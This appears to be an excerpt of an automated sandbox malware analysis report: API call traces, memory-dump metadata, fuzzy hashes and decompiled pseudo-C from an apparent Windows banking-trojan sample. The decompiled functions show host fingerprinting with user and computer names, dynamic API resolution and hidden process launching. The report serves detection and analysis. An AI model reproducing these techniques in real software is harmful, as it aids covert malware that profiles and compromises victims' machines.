                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A61F9
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A6227
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A6238
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A624C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A626A
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A1974: strcpy.NTDLL ref: 031A19BE
                                                                                                                                    • Part of subcall function 031A1974: lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,031AC2AC,?,05BD95B0), ref: 031A62A1
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A38CA: lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                    • Part of subcall function 031A38CA: lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 031A62C2
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 031A62CA
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 031A62D8
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 031A62DE
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • wcstombs.NTDLL ref: 031A636F
                                                                                                                                    • Part of subcall function 031A3273: SysAllocString.OLEAUT32(?), ref: 031A32AE
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 031A63B0
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 031A63BC
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,05BD95B0), ref: 031A63C8
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A63D4
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A63E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3748877296-8415677
                                                                                                                                  • Opcode ID: da012d52c4036d338fa0059189febd5015896afb055b4134b1ea205ba3cc4018
                                                                                                                                  • Instruction ID: efa53d26e6980f1bbbba68acff6287ee352a5f7e1d8101447a42ba69719bda2a
                                                                                                                                  • Opcode Fuzzy Hash: da012d52c4036d338fa0059189febd5015896afb055b4134b1ea205ba3cc4018
                                                                                                                                  • Instruction Fuzzy Hash: 33914B79900A08AFCB15EFA8ED44A9E7BB9FF4C312F184055F409D7250DB31D991DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction ID: eb78d8570a4bbdc9c95a2e08f4bf35dd40646a14c0041922e4eb7bc93e1da6a4
                                                                                                                                  • Opcode Fuzzy Hash: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction Fuzzy Hash: FB317E31605A219FEB609BB9E844BDAB3FCAF51354F744819E454D6269EF30EC54CF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E031A1000(void* __eax, void* __ecx) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				void _v104;
                                                                                                                                  				char _v108;
                                                                                                                                  				long _t36;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  
                                                                                                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                  				_t69 =  *_t1;
                                                                                                                                  				_t36 = E031A4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                  				_v8 = _t36;
                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				E031AA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                  				_t40 = _v12(_v12);
                                                                                                                                  				_v8 = _t40;
                                                                                                                                  				if(_t40 == 0 && ( *0x31ad298 & 0x00000001) != 0) {
                                                                                                                                  					_v32 = 0;
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					asm("stosd");
                                                                                                                                  					_v108 = 0;
                                                                                                                                  					memset( &_v104, 0, 0x40);
                                                                                                                                  					_t47 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t18 = _t47 + 0x31ae3b3; // 0x73797325
                                                                                                                                  					_t68 = E031A2291(_t18);
                                                                                                                                  					if(_t68 == 0) {
                                                                                                                                  						_v8 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_t50 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t19 = _t50 + 0x31ae760; // 0x5bd8d08
                                                                                                                                  						_t20 = _t50 + 0x31ae0af; // 0x4e52454b
                                                                                                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                  						if(_t71 == 0) {
                                                                                                                                  							_v8 = 0x7f;
                                                                                                                                  						} else {
                                                                                                                                  							_v108 = 0x44;
                                                                                                                                  							E031A34C7();
                                                                                                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                  							_push(1);
                                                                                                                                  							E031A34C7();
                                                                                                                                  							if(_t58 == 0) {
                                                                                                                                  								_v8 = GetLastError();
                                                                                                                                  							} else {
                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                  								CloseHandle(_v32);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0x31ad270, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t70 = _v16;
                                                                                                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                  				E031A4AAB(_t70);
                                                                                                                                  				goto L12;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031A101C,?,00000001,?,?,00000000,00000000), ref: 031A485C
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 031A487E
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 031A4894
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031A48AA
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031A48C0
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031A48D6
                                                                                                                                  • memset.NTDLL ref: 031A106A
                                                                                                                                    • Part of subcall function 031A2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031A1083,73797325), ref: 031A22A2
                                                                                                                                    • Part of subcall function 031A2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031A22BC
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,05BD8D08,73797325), ref: 031A10A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 031A10A7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A110F
                                                                                                                                    • Part of subcall function 031A34C7: GetProcAddress.KERNEL32(36776F57,031A5B13), ref: 031A34E2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 031A10EC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 031A10F1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 031A10F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3075724336-969920318
                                                                                                                                  • Opcode ID: 57fff6457dc1dad9e5a8d0215e1f7bdcf7289910f02933ee20caff28039219f7
                                                                                                                                  • Instruction ID: 51d6797d9cf5e4e7d92e5da7fe5c29d4986906af20f3fb6dc58feba7a84f2429
                                                                                                                                  • Opcode Fuzzy Hash: 57fff6457dc1dad9e5a8d0215e1f7bdcf7289910f02933ee20caff28039219f7
                                                                                                                                  • Instruction Fuzzy Hash: 94313FBA900A08BFDB11EFE8DD88D9EBBB8EF0C346F144469E545E7110D770A945DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                  			E031A5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t43;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				void* _t48;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t59;
                                                                                                                                  				void* _t60;
                                                                                                                                  				intOrPtr _t66;
                                                                                                                                  				void* _t71;
                                                                                                                                  				void* _t74;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                  				intOrPtr _t91;
                                                                                                                                  
                                                                                                                                  				_t79 =  *0x31ad37c; // 0x5bd9818
                                                                                                                                  				_v24 = 8;
                                                                                                                                  				_t43 = GetTickCount();
                                                                                                                                  				_push(5);
                                                                                                                                  				_t74 = 0xa;
                                                                                                                                  				_v16 = _t43;
                                                                                                                                  				_t44 = E031A3A69(_t74,  &_v16);
                                                                                                                                  				_v8 = _t44;
                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                  					_v8 = 0x31ac1ac;
                                                                                                                                  				}
                                                                                                                                  				_t46 = E031A51DA(_t79);
                                                                                                                                  				_v12 = _t46;
                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                  					_t80 = __imp__;
                                                                                                                                  					_t48 =  *_t80(_v8, _t71);
                                                                                                                                  					_t49 =  *_t80(_v12);
                                                                                                                                  					_t50 =  *_t80(_a4);
                                                                                                                                  					_t54 = E031A75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                  					_v20 = _t54;
                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                  						_t75 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t16 = _t75 + 0x31aeb10; // 0x530025
                                                                                                                                  						 *0x31ad118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                  						_push(4);
                                                                                                                                  						_t77 = 5;
                                                                                                                                  						_t57 = E031A3A69(_t77,  &_v16);
                                                                                                                                  						_v8 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_v8 = 0x31ac1b0;
                                                                                                                                  						}
                                                                                                                                  						_t58 =  *_t80(_v8);
                                                                                                                                  						_t59 =  *_t80(_v12);
                                                                                                                                  						_t60 =  *_t80(_a4);
                                                                                                                                  						_t91 = E031A75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                  						if(_t91 == 0) {
                                                                                                                                  							E031A4AAB(_v20);
                                                                                                                                  						} else {
                                                                                                                                  							_t66 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  							_t31 = _t66 + 0x31aec30; // 0x73006d
                                                                                                                                  							 *0x31ad118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                  							 *_a16 = _v20;
                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                  							 *_a20 = _t91;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E031A4AAB(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _v24;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A5F79
                                                                                                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 031A5FB9
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 031A5FC2
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 031A5FC9
                                                                                                                                  • lstrlenW.KERNEL32(80000002), ref: 031A5FD6
                                                                                                                                  • lstrlen.KERNEL32(?,00000004), ref: 031A6036
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A603F
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A6046
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 031A604D
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2535036572-0
                                                                                                                                  • Opcode ID: a3fd87f3024e99f6aaa3c41f99a65fd62a488d983899e97803deabaf2a5076d3
                                                                                                                                  • Instruction ID: b62314a71445ce8fd20552a7d635a67e0940db1ebf08640f14c732c966d17055
                                                                                                                                  • Opcode Fuzzy Hash: a3fd87f3024e99f6aaa3c41f99a65fd62a488d983899e97803deabaf2a5076d3
                                                                                                                                  • Instruction Fuzzy Hash: A441797A900A19FFCF11EFA8DD0899EBBB5EF48345F094055E900AB211DB35DB51EBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  • Opcode ID: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction ID: ed8a075b3687f1ef9bae86a4afd6dfa99254e542ee22670e7f213bffc20a41de
                                                                                                                                  • Opcode Fuzzy Hash: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction Fuzzy Hash: 51C16F7594122ADFDB24CF68C898A9DB3B8FF49304F6045AAD819A7354D731EE90CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A137A() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				long _t39;
                                                                                                                                  				long _t43;
                                                                                                                                  				signed int _t47;
                                                                                                                                  				short _t51;
                                                                                                                                  				signed int _t52;
                                                                                                                                  				int _t56;
                                                                                                                                  				int _t57;
                                                                                                                                  				char* _t64;
                                                                                                                                  				short* _t67;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				GetUserNameW(0,  &_v8);
                                                                                                                                  				_t39 = _v8;
                                                                                                                                  				if(_t39 != 0) {
                                                                                                                                  					_v12 = _t39;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					GetComputerNameW(0,  &_v8);
                                                                                                                                  					_t43 = _v8;
                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                  						_v12 = _v12 + _t43 + 2;
                                                                                                                                  						_t64 = E031A75F6(_v12 + _t43 + 2 << 2);
                                                                                                                                  						if(_t64 != 0) {
                                                                                                                                  							_t47 = _v12;
                                                                                                                                  							_t67 = _t64 + _t47 * 2;
                                                                                                                                  							_v8 = _t47;
                                                                                                                                  							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                  								L7:
                                                                                                                                  								E031A4AAB(_t64);
                                                                                                                                  							} else {
                                                                                                                                  								_t51 = 0x40;
                                                                                                                                  								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                  								_t52 = _v8;
                                                                                                                                  								_v12 = _v12 - _t52;
                                                                                                                                  								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                  									goto L7;
                                                                                                                                  								} else {
                                                                                                                                  									_t56 = _v12 + _v8;
                                                                                                                                  									_t31 = _t56 + 2; // 0x31a4565
                                                                                                                                  									_v12 = _t56;
                                                                                                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                  									_v8 = _t57;
                                                                                                                                  									if(_t57 == 0) {
                                                                                                                                  										goto L7;
                                                                                                                                  									} else {
                                                                                                                                  										_t64[_t57] = 0;
                                                                                                                                  										_v16 = _t64;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v16;
                                                                                                                                  			}
















                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,031A4563), ref: 031A138E
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,031A4563), ref: 031A13AA
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,031A4563), ref: 031A13E4
                                                                                                                                  • GetComputerNameW.KERNEL32(031A4563,?), ref: 031A1407
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,031A4563,00000000,031A4565,00000000,00000000,?,?,031A4563), ref: 031A142A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                  • String ID: @ht
                                                                                                                                  • API String ID: 3850880919-1371871952
                                                                                                                                  • Opcode ID: b0752261b834d158fcb108265dafdf13c7deed4a327e615606986c640a0f86e5
                                                                                                                                  • Instruction ID: 285dd0b3632e960bfb1d8bc73f5a345760297e8e0d47946c076f60585aacf388
                                                                                                                                  • Opcode Fuzzy Hash: b0752261b834d158fcb108265dafdf13c7deed4a327e615606986c640a0f86e5
                                                                                                                                  • Instruction Fuzzy Hash: 0A21D77A900608FFDB11DFE9D984DEEBBB9EF48201F5444AAE501E7201EB309B45DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E031A1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				char* _t28;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				char* _t36;
                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                  				char* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				char* _t43;
                                                                                                                                  
                                                                                                                                  				_t34 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t9 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t1 = _t9 + 0x31ae62c; // 0x253d7325
                                                                                                                                  				_t36 = 0;
                                                                                                                                  				_t28 = E031A43A8(__ecx, _t1);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					_t40 = __imp__;
                                                                                                                                  					_t13 =  *_t40(_t28);
                                                                                                                                  					_v8 = _t13;
                                                                                                                                  					_t41 = E031A75F6(_v8 +  *_t40(_a4) + 1);
                                                                                                                                  					if(_t41 != 0) {
                                                                                                                                  						strcpy(_t41, _t28);
                                                                                                                                  						_pop(_t33);
                                                                                                                                  						__imp__(_t41, _a4);
                                                                                                                                  						_t36 = E031A5601(_t34, _t41, _a8);
                                                                                                                                  						E031A4AAB(_t41);
                                                                                                                                  						_t42 = E031A756E(StrTrimA(_t36, "="), _t36);
                                                                                                                                  						if(_t42 != 0) {
                                                                                                                                  							E031A4AAB(_t36);
                                                                                                                                  							_t36 = _t42;
                                                                                                                                  						}
                                                                                                                                  						_t43 = E031A26DD(_t36, _t33);
                                                                                                                                  						if(_t43 != 0) {
                                                                                                                                  							E031A4AAB(_t36);
                                                                                                                                  							_t36 = _t43;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E031A4AAB(_t28);
                                                                                                                                  				}
                                                                                                                                  				return _t36;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A43A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,031A198E,253D7325,00000000,00000000,7691C740,?,?,031A4653,?), ref: 031A440F
                                                                                                                                    • Part of subcall function 031A43A8: sprintf.NTDLL ref: 031A4430
                                                                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                  • lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • strcpy.NTDLL ref: 031A19BE
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,031A19D8,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A5618
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
